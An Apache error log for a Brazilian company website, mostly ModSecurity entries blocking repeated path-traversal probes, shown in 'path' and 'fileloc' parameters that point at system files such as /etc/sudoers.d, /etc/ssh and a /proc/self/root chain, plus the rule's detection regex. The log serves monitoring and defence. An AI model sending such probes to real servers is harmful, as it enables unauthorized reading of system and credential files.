[Fri Mar 20 10:23:32.816965 2026] [:error] [pid 9818:tid 140411716749056] [client 57.141.18.103:51930] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KU11pVZ5mVmJwsFNNnQAAAEM"]
[Fri Mar 20 10:23:36.767966 2026] [:error] [pid 7235:tid 140411641214720] [client 57.141.18.109:52102] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KWPqxLDW4GITHUkQHrAAAAQw"]
[Fri Mar 20 10:23:40.731857 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:58128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1KXOoXxyEfFpUF8f-eaAAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:23:46.067433 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.68:52522] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KYvHIg5MgXLBnicMUTwAAAdM"]
[Fri Mar 20 10:23:57.482717 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.106:53216] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KbF1pVZ5mVmJwsFNNzAAAAFA"]
[Fri Mar 20 10:24:09.348619 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.228.61:43270] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1KePHIg5MgXLBnicMUbgAAAc4"]
[Fri Mar 20 10:24:12.104105 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.69:53960] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KfDJ3M9BSuKP7CAZAPgAAAJQ"]
[Fri Mar 20 10:24:12.250370 2026] [mime_magic:error] [pid 15826:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:53972] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:24:13.665977 2026] [mime_magic:error] [pid 7893:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:54064] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:24:14.983373 2026] [:error] [pid 31215:tid 140411540502272] [client 57.141.18.37:54148] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KfgF0L0L-SsrnPo6HCQAAAtg"]
[Fri Mar 20 10:24:15.430974 2026] [:error] [pid 21219:tid 140411548894976] [client 57.141.18.98:54176] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Kf_XLqtnMIWvjpaK4ggAAApc"]
[Fri Mar 20 10:24:15.856479 2026] [:error] [pid 11167:tid 140411649607424] [client 57.141.18.68:54214] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Kf_HIg5MgXLBnicMUdAAAAcs"]
[Fri Mar 20 10:24:16.355231 2026] [:error] [pid 26799:tid 140411590858496] [client 57.141.18.89:54240] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KgNa6ubjKNq_cu4b3ogAAA1I"]
[Fri Mar 20 10:24:17.070041 2026] [mime_magic:error] [pid 11167:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:54286] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:24:17.070282 2026] [mime_magic:error] [pid 10189:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:54288] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:24:21.964441 2026] [mime_magic:error] [pid 7893:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:54600] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:24:23.939656 2026] [:error] [pid 31215:tid 140411582465792] [client 57.141.18.19:54740] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KhwF0L0L-SsrnPo6HEgAAAtM"]
[Fri Mar 20 10:24:27.477018 2026] [:error] [pid 31215:tid 140411725141760] [client 57.141.18.65:54876] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KigF0L0L-SsrnPo6HFAAAAsI"]
[Fri Mar 20 10:24:29.040413 2026] [:error] [pid 9818:tid 140411582465792] [client 57.141.18.121:54874] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Kil1pVZ5mVmJwsFNN9gAAAFM"]
[Fri Mar 20 10:24:31.051477 2026] [:error] [pid 11642:tid 140411699963648] [client 57.141.18.117:54914] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Kj7ninkcc-iUj5Ap7zQAAA4U"]
[Fri Mar 20 10:24:44.901208 2026] [:error] [pid 7235:tid 140411699963648] [client 57.141.18.5:55790] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KnPqxLDW4GITHUkQICgAAAQU"]
[Fri Mar 20 10:24:53.268123 2026] [:error] [pid 11167:tid 140411658000128] [client 57.141.18.104:56068] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KpfHIg5MgXLBnicMUmAAAAco"]
[Fri Mar 20 10:24:53.578720 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.12:56042] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1Kpda6ubjKNq_cu4b3ygAAA1U"]
[Fri Mar 20 10:24:59.662103 2026] [:error] [pid 10189:tid 140411733534464] [client 57.141.18.47:56264] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KqzJ3M9BSuKP7CAZAhwAAAIE"]
[Fri Mar 20 10:25:08.199435 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.35:56478] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1KtNa6ubjKNq_cu4b31QAAA1A"]
[Fri Mar 20 10:25:08.943033 2026] [:error] [pid 9818:tid 140411649607424] [client 57.141.18.75:56510] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KtF1pVZ5mVmJwsFNOBwAAAEs"]
[Fri Mar 20 10:25:09.294419 2026] [:error] [pid 9818:tid 140411741927168] [client 57.141.18.108:56454] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KtV1pVZ5mVmJwsFNOCAAAAEA"]
[Fri Mar 20 10:25:09.361747 2026] [:error] [pid 31215:tid 140411607643904] [client 57.141.18.100:56398] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KtQF0L0L-SsrnPo6HKgAAAtA"]
[Fri Mar 20 10:25:14.272149 2026] [:error] [pid 9818:tid 140411708356352] [client 57.141.18.57:56712] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1Kul1pVZ5mVmJwsFNOCwAAAEQ"]
[Fri Mar 20 10:25:18.874411 2026] [:error] [pid 10189:tid 140411674785536] [client 57.141.18.97:56972] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1KvjJ3M9BSuKP7CAZAlAAAAIg"]
[Fri Mar 20 10:25:27.729665 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.244.43:43068] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1Kx9a6ubjKNq_cu4b36QAAA1Y"]
[Fri Mar 20 10:25:40.939389 2026] [:error] [pid 10189:tid 140411649607424] [client 57.141.18.62:57656] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1K1DJ3M9BSuKP7CAZAuwAAAIs"]
[Fri Mar 20 10:25:41.296002 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.116:57628] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1K1TJ3M9BSuKP7CAZAvQAAAJA"]
